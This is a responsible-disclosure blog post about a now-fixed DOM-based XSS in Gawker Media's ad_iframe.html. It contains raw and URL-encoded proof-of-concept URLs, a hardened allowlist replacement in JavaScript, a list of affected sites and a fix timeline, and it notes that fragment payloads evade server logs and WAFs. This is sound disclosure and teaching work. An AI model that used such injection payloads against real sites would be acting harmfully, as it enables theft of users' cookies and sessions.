While browsing the Gizmodo website I noticed a request to a file called ad_iframe.html in the assets directory. Checking the source code of that file I found:
The variable scriptsrc isn't escaped at all: it is taken straight from location.hash and written into the page.
<script>
var location_parts = window.location.hash.substring(1).split('|');
var rand = location_parts[0];
var scriptsrc = decodeURIComponent(location_parts[1]); // attacker-controlled: comes from the URL fragment
document.write("<scr"+"ipt src='" + scriptsrc + "'></scr"+"ipt>"); // sink: raw string concatenation into markup
</script>
By supplying the expected hash and pipe characters, an attacker controls everything after the pipe: a single quote closes the src attribute, and whatever follows is parsed as HTML by document.write. That is a DOM-based XSS, and because the payload lives in the URL fragment it is never sent to the server, so it leaves no trace in server logs and passes any server-side filter or WAF untouched.
How can this be exploited?
Proof-of-concept on Gizmodo:
http://gizmodo.com/assets/ad_iframe.html#|'></script><script>alert("xss by @dsopas");</script><div x='
Proof-of-concept on Gizmodo (encoded):
http://gizmodo.com/assets/ad_iframe.html#|'>%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%20%62%79%20%40%64%73%6F%70%61%73%22%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%64%69%76%20%78%3D%27
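As an added example (this is not Gawker Media's code, nor the fix they deployed), here is the vulnerable logic above rewritten as a pure function beside a hardened replacement, so both can be run under Node with the proof-of-concept fragments as input. The host names in ALLOWED_SCRIPT_HOSTS and all function names are assumptions for illustration:

```javascript
// Added example, not Gawker Media's code. The vulnerable ad_iframe.html logic
// and a hardened variant as pure functions, runnable outside a browser.

// Assumed allowlist of hosts the ad loader is permitted to fetch script from.
const ALLOWED_SCRIPT_HOSTS = new Set(["ads.example.com", "cdn.example.net"]);

// Sample input: the two proof-of-concept fragments from the post (raw and encoded).
const POC_HASH_RAW = "#|'></script><script>alert(\"xss by @dsopas\");</script><div x='";
const POC_HASH_ENCODED = "#|'>%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%20%62%79%20%40%64%73%6F%70%61%73%22%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%64%69%76%20%78%3D%27";

// Vulnerable: the same three steps as the original page. Returns the string that
// document.write() would receive. Any quote or tag inside parts[1] lands in the
// markup unchanged, so the attacker controls the rest of the document.
function buildScriptTagVulnerable(hash) {
  const parts = hash.substring(1).split("|");
  const scriptsrc = decodeURIComponent(parts[1]);
  // The original writes "</scr"+"ipt>" only so the HTML parser does not end the
  // inline <script> block early; that trick offers no protection against input.
  return "<script src='" + scriptsrc + "'></script>";
}

// Hardened: treat the fragment as untrusted data. Decode defensively, parse it as
// an absolute URL, and accept only https URLs whose host is allowlisted.
// Returns the normalized URL string, or null when the input must be dropped.
function pickScriptSrc(hash) {
  const parts = hash.substring(1).split("|");
  if (parts.length < 2) return null;
  let raw;
  try {
    raw = decodeURIComponent(parts[1]); // throws URIError on malformed %xx
  } catch (e) {
    return null;
  }
  let url;
  try {
    url = new URL(raw); // throws on relative or unparsable input
  } catch (e) {
    return null;
  }
  // url.hostname is what the browser will actually connect to, so a URL such as
  // "https://ads.example.com@evil.example/x.js" is rejected here.
  if (url.protocol !== "https:" || !ALLOWED_SCRIPT_HOSTS.has(url.hostname)) return null;
  return url.href;
}

// Browser-side loader for the hardened path: build the element with DOM APIs so
// the value goes into the src attribute and is never parsed as HTML.
function loadAdScript(hash, doc) {
  const src = pickScriptSrc(hash);
  if (src === null) return false;
  const el = doc.createElement("script");
  el.src = src;
  doc.head.appendChild(el);
  return true;
}

// Demo: the raw and encoded proof-of-concept decode to the same injected markup.
console.log("vulnerable:", buildScriptTagVulnerable(POC_HASH_RAW));
console.log("same after decoding:", buildScriptTagVulnerable(POC_HASH_ENCODED) === buildScriptTagVulnerable(POC_HASH_RAW));
console.log("hardened:", pickScriptSrc(POC_HASH_RAW));
console.log("legit:", pickScriptSrc("#42|https%3A%2F%2Fads.example.com%2Fad.js"));
```

In the page itself the hardened path would be called as loadAdScript(window.location.hash, document). Validating against an allowlist rather than escaping is the right shape here: the value is a URL that will be fetched and executed, so escaping the quote would stop the attribute breakout but still let an attacker point the iframe at any script on the Internet. A Content-Security-Policy script-src restricted to the same hosts gives a second, independent layer.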
A malicious user could also:
- access other sites inside another client's private intranet.
- steal another client's cookie(s).
- modify another client's cookie(s).
- steal another client's submitted form data.
- modify another client's submitted form data (before it reaches the server).
- submit a form to the application on the user's behalf which modifies passwords or other application data.
This DOM XSS vulnerability was present in many Gawker Media websites:
http://gawker.com/assets/ad_iframe.html
http://gizmodo.com/assets/ad_iframe.html
http://lifehacker.com/assets/ad_iframe.html
http://deadspin.com/assets/ad_iframe.html
http://io9.com/assets/ad_iframe.html
http://jalopnik.com/assets/ad_iframe.html
http://jezebel.com/assets/ad_iframe.html
http://kotaku.com/assets/ad_iframe.html
I want to thank the Gawker Media tech team for fixing this issue in less than 24 hours. They really care about security and their users.
Timeline:
02 Sep 2013: Reported to Gawker Media
03 Sep 2013: Gawker Media replied that a fix had been deployed
06 Sep 2013: Full disclosure